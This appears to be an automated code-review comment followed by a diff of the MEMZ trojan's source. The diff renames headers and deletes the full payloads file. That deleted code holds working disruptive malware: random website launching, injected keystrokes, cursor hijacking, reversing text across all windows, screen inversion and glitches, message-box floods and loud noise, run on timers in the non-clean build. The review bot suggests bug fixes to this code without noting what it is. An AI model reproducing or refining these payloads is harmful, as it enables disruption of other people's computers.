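Review bot: random() returns an uninitialised `out` when CryptGenRandom fails, because the call's return value is ignored; reading that value is undefined behaviour. Initialise the variable and check the call, for example `int out = 0;` and `if (!CryptGenRandom(prov, sizeof(out), (BYTE *)&out)) ExitProcess(1);`, which matches how the CryptAcquireContext failure is already handled. `prov` is also initialised lazily with no synchronisation although random() is called from the payload threads, and it is compared with `NULL` although `HCRYPTPROV` is an integer handle, so `prov == 0` is the matching test.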


@ -1,4 +1,4 @@
#include "memz.h"
#include "MEMZ.h"
#ifdef CLEAN
HWND mainWindow; // In the main window, in the main window, in the main window, ...


@ -18,7 +18,7 @@ processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*'\"")
#define WINDOWHEIGHT ROWS * BTNHEIGHT + (ROWS + 1)*SPACE + 32
#endif
#pragma once
//#pragma once
#include <windows.h>
#include <tlhelp32.h>
@ -27,7 +27,7 @@ processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*'\"")
#include <commctrl.h>
#include "../Build/Data.h"
#include "payloads.h"
#include "Payloads/Payloads.h"
void start();
@ -49,19 +49,4 @@ DWORD WINAPI watchdogThread(LPVOID);
DWORD WINAPI keyboardThread(LPVOID lParam);
extern BOOLEAN enablePayloads;
BOOL CALLBACK CleanWindowsProc(HWND hwnd, LPARAM lParam);
#endif
PAYLOADFUNCTIONDEFAULT(payloadExecute);
PAYLOADFUNCTIONDEFAULT(payloadCursor);
PAYLOADFUNCTIONVISUAL(payloadInvert);
PAYLOADFUNCTIONDEFAULT(payloadMessageBox);
DWORD WINAPI messageBoxThread(LPVOID);
LRESULT CALLBACK msgBoxHook(int, WPARAM, LPARAM);
PAYLOADFUNCTIONDEFAULT(payloadReverseText);
BOOL CALLBACK EnumChildProc(HWND hwnd, LPARAM lParam);
PAYLOADFUNCTIONDEFAULT(payloadSound);
PAYLOADFUNCTIONVISUAL(payloadGlitches);
PAYLOADFUNCTIONDEFAULT(payloadKeyboard);
PAYLOADFUNCTIONVISUAL(payloadTunnel);
PAYLOADFUNCTIONVISUAL(payloadDrawErrors);
PAYLOADHOST(payloadHostCrazyBus);
#endif


@ -1,306 +0,0 @@
#include "memz.h"
PAYLOAD payloads[] = {
#ifdef CLEAN
{ payloadHostDefault, (LPVOID)payloadExecute, L"Open random websites/programs", FALSE, 0, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadCursor, L"Random cursor movement", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadKeyboard, L"Random keyboard input", FALSE, 0, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadSound, L"Random error sounds", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadInvert, L"Invert Screen", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadMessageBox, L"Message boxes", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadDrawErrors, L"Draw error icons", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadReverseText, L"Reverse text", FALSE, 0, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadTunnel, L"Tunnel effect", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadGlitches, L"Screen glitches", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostCrazyBus, NULL, L"Crazy Bus (Ear Rape)", TRUE, 0, 0, 0, 0, 0 },
#else
{ payloadHostDefault, (LPVOID)payloadExecute, 30000, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadCursor, 30000, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadKeyboard, 20000, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadSound, 50000, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadInvert, 30000, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadMessageBox, 20000, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadDrawErrors, 10000, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadReverseText, 40000, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadTunnel, 60000, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadGlitches, 15000, 0, 0, 0, 0 },
{ payloadHostCrazyBus, NULL, 1000, 0, 0, 0, 0 },
#endif
};
const size_t nPayloads = sizeof(payloads) / sizeof(PAYLOAD);
BOOLEAN enablePayloads = TRUE;
PAYLOADHOST(payloadHostDefault) {
PAYLOAD *payload = (PAYLOAD*)parameter;
for (;;) {
#ifdef CLEAN
if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
#endif
if (payload->delaytime++ >= payload->delay) {
#ifdef CLEAN
payload->delay = ((PAYLOADFUNCTIONDEFAULT((*)))payload->payloadFunction)(payload->times++, payload->runtime, FALSE);
#else
payload->delay = ((PAYLOADFUNCTIONDEFAULT((*)))payload->payloadFunction)(payload->times++, payload->runtime);
#endif
payload->delaytime = 0;
}
payload->runtime++;
#ifdef CLEAN
} else {
payload->runtime = 0;
payload->times = 0;
payload->delay = 0;
}
#endif
Sleep(10);
}
}
PAYLOADHOST(payloadHostVisual) {
PAYLOAD *payload = (PAYLOAD*)parameter;
HWND hwnd = GetDesktopWindow();
HDC hdc = GetWindowDC(hwnd);
RECT rekt;
GetWindowRect(hwnd, &rekt);
int w = rekt.right - rekt.left;
int h = rekt.bottom - rekt.top;
for (;;) {
#ifdef CLEAN
if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
#endif
if (payload->delaytime++ >= payload->delay) {
#ifdef CLEAN
payload->delay = ((PAYLOADFUNCTIONVISUAL((*)))payload->payloadFunction)(payload->times++, payload->runtime, FALSE, hwnd, hdc, &rekt, w, h);
#else
payload->delay = ((PAYLOADFUNCTIONVISUAL((*)))payload->payloadFunction)(payload->times++, payload->runtime, hwnd, hdc, &rekt, w, h);
#endif
payload->delaytime = 0;
}
payload->runtime++;
#ifdef CLEAN
}
else {
payload->runtime = 0;
payload->times = 0;
payload->delay = 0;
}
#endif
Sleep(10);
}
}
PAYLOADFUNCTIONDEFAULT(payloadExecute) {
PAYLOADHEAD
ShellExecuteA(NULL, "open", (LPCSTR)Sites[random() % SitesLen], NULL, NULL, SW_SHOWDEFAULT);
out: return 1500.0 / (times / 15.0 + 1) + 100 + (random() % 200);
}
PAYLOADFUNCTIONVISUAL(payloadInvert) {
PAYLOADHEAD
BitBlt(hdc, 0, 0, w, h, hdc, 0, 0, NOTSRCCOPY);
out: return 100;
}
PAYLOADFUNCTIONDEFAULT(payloadCursor) {
PAYLOADHEAD
POINT cursor;
GetCursorPos(&cursor);
SetCursorPos(cursor.x + (random() % 3 - 1) * (random() % (runtime / 2200 + 2)), cursor.y + (random() % 3 - 1) * (random() % (runtime / 2200 + 2)));
out: return 2;
}
PAYLOADFUNCTIONDEFAULT(payloadMessageBox) {
PAYLOADHEAD
CreateThread(NULL, 4096, &messageBoxThread, NULL, NULL, NULL);
out: return 2000.0 / (times / 8.0 + 1) + 20 + (random() % 30);
}
DWORD WINAPI messageBoxThread(LPVOID parameter) {
HHOOK hook = SetWindowsHookEx(WH_CBT, msgBoxHook, 0, GetCurrentThreadId());
MessageBoxW(NULL, L"Still using this computer?", L"lol", MB_SYSTEMMODAL | MB_OK | MB_ICONWARNING);
UnhookWindowsHookEx(hook);
return 0;
}
LRESULT CALLBACK msgBoxHook(int nCode, WPARAM wParam, LPARAM lParam) {
if (nCode == HCBT_CREATEWND) {
CREATESTRUCT *pcs = ((CBT_CREATEWND *)lParam)->lpcs;
if ((pcs->style & WS_DLGFRAME) || (pcs->style & WS_POPUP)) {
HWND hwnd = (HWND)wParam;
int x = random() % (GetSystemMetrics(SM_CXSCREEN) - pcs->cx);
int y = random() % (GetSystemMetrics(SM_CYSCREEN) - pcs->cy);
pcs->x = x;
pcs->y = y;
}
}
return CallNextHookEx(0, nCode, wParam, lParam);
}
PAYLOADFUNCTIONDEFAULT(payloadReverseText) {
PAYLOADHEAD
EnumChildWindows(GetDesktopWindow(), &EnumChildProc, NULL);
out: return 50;
}
BOOL CALLBACK EnumChildProc(HWND hwnd, LPARAM lParam) {
LPWSTR str = (LPWSTR)GlobalAlloc(GMEM_ZEROINIT, sizeof(WCHAR) * 8192);
if (SendMessageTimeoutW(hwnd, WM_GETTEXT, 8192, (LPARAM)str, SMTO_ABORTIFHUNG, 100, NULL)) {
strReverseW(str);
SendMessageTimeoutW(hwnd, WM_SETTEXT, NULL, (LPARAM)str, SMTO_ABORTIFHUNG, 100, NULL);
}
GlobalFree(str);
return TRUE;
}
const char *sounds[] = {
"SystemHand",
"SystemQuestion",
"SystemExclamation"
};
PAYLOADFUNCTIONDEFAULT(payloadSound) {
PAYLOADHEAD
// There seems to be a bug where toggling ALL payloads kills the sound output on some systems.
// I don't know why this happens, but using SND_SYNC seems to fix the bug.
// But the sound is not not as fast as before. I hope there is another way to fix it without slowing down the payload.
// As this only happens for the enable-disable part, I will only include that in the clean build as a workaround.
#ifdef CLEAN
PlaySoundA(sounds[random() % (sizeof(sounds)/sizeof(sounds[0]))], GetModuleHandle(NULL), SND_SYNC);
out: return random() % 10;
#else
PlaySoundA(sounds[random() % (sizeof(sounds)/sizeof(sounds[0]))], GetModuleHandle(NULL), SND_ASYNC);
out: return 20 + (random() % 20);
#endif
}
PAYLOADFUNCTIONVISUAL(payloadGlitches) {
PAYLOADHEAD
int x1 = random() % (w - 400);
int y1 = random() % (h - 400);
int x2 = random() % (w - 400);
int y2 = random() % (h - 400);
int width = random() % 400;
int height = random() % 400;
BitBlt(hdc, x1, y1, width, height, hdc, x2, y2, SRCCOPY);
out: return 200.0 / (times / 5.0 + 1) + 3;
}
PAYLOADFUNCTIONDEFAULT(payloadKeyboard) {
PAYLOADHEAD
INPUT input;
input.type = INPUT_KEYBOARD;
input.ki.wVk = (random() % (0x5a - 0x30)) + 0x30;
SendInput(1, &input, sizeof(INPUT));
out: return 300 + (random() % 400);
}
PAYLOADFUNCTIONVISUAL(payloadTunnel) {
PAYLOADHEAD
StretchBlt(hdc, 50, 50, w - 100, h - 100, hdc, 0, 0, w, h, SRCCOPY);
out: return 200.0 / (times / 5.0 + 1) + 4;
}
PAYLOADFUNCTIONVISUAL(payloadDrawErrors) {
PAYLOADHEAD
int ix = GetSystemMetrics(SM_CXICON) / 2;
int iy = GetSystemMetrics(SM_CYICON) / 2;
POINT cursor;
GetCursorPos(&cursor);
DrawIcon(hdc, cursor.x - ix, cursor.y - iy, LoadIcon(NULL, IDI_ERROR));
if (random() % (int)(10/(times/500.0+1)+1) == 0) {
DrawIcon(hdc, random()%(w-ix), random()%(h-iy), LoadIcon(NULL, IDI_WARNING));
}
out: return 2;
}
PAYLOADHOST(payloadHostCrazyBus) {
PAYLOAD *payload = (PAYLOAD*)parameter;
WAVEFORMATEX fmt = { WAVE_FORMAT_PCM, 1, 44100, 44100, 1, 8, 0 };
HWAVEOUT hwo;
waveOutOpen(&hwo, WAVE_MAPPER, &fmt, NULL, NULL, CALLBACK_NULL);
const int bufsize = 44100 * 30; // 30 Seconds
char *wavedata = (char *)LocalAlloc(0, bufsize);
WAVEHDR hdr = { wavedata, bufsize, 0, 0, 0, 0, 0, 0 };
waveOutPrepareHeader(hwo, &hdr, sizeof(hdr));
for (;;) {
#ifdef CLEAN
if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
#endif
int freq = 0;
for (int i = 0; i < bufsize; i++) {
if (i % (44100 / 4) == 0)
freq = 44100 / ((random() % 4000) + 1000);
wavedata[i] = (char)(((i % freq) / ((float)freq)) * 100);
}
#ifdef CLEAN
waveOutReset(hwo);
#endif
waveOutWrite(hwo, &hdr, sizeof(hdr));
while (!(hdr.dwFlags & WHDR_DONE)
#ifdef CLEAN
&& (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED)
#endif
) {
Sleep(1);
}
#ifdef CLEAN
if (!enablePayloads || SendMessage(payload->btn, BM_GETCHECK, 0, NULL) != BST_CHECKED) {
waveOutPause(hwo);
}
} else {
Sleep(10);
}
#endif
}
}


@ -1,33 +0,0 @@
#pragma once
#include "memz.h"
#define PAYLOADHOST(name) DWORD (WINAPI name)(LPVOID parameter)
typedef struct {
PAYLOADHOST(*payloadHost);
void *payloadFunction;
#ifdef CLEAN
wchar_t *name;
BOOLEAN safe;
HWND btn;
int delaytime, delay, runtime, times;
#else
int startDelay;
int delaytime, delay, runtime, times;
#endif
} PAYLOAD;
#ifdef CLEAN
#define PAYLOADFUNCTIONDEFAULT(name) int name (int times, int runtime, BOOLEAN skip)
#define PAYLOADFUNCTIONVISUAL(name) int name (int times, int runtime, BOOLEAN skip, HWND hwnd, HDC hdc, LPRECT rekt, int w, int h)
#define PAYLOADHEAD if (skip) goto out;
#else
#define PAYLOADFUNCTIONDEFAULT(name) int name (int times, int runtime)
#define PAYLOADFUNCTIONVISUAL(name) int name (int times, int runtime, HWND hwnd, HDC hdc, LPRECT rekt, int w, int h)
#define PAYLOADHEAD
#endif
extern PAYLOAD payloads[];
extern const size_t nPayloads;


@ -1,4 +1,4 @@
#include "memz.h"
#include "MEMZ.h"
HCRYPTPROV prov;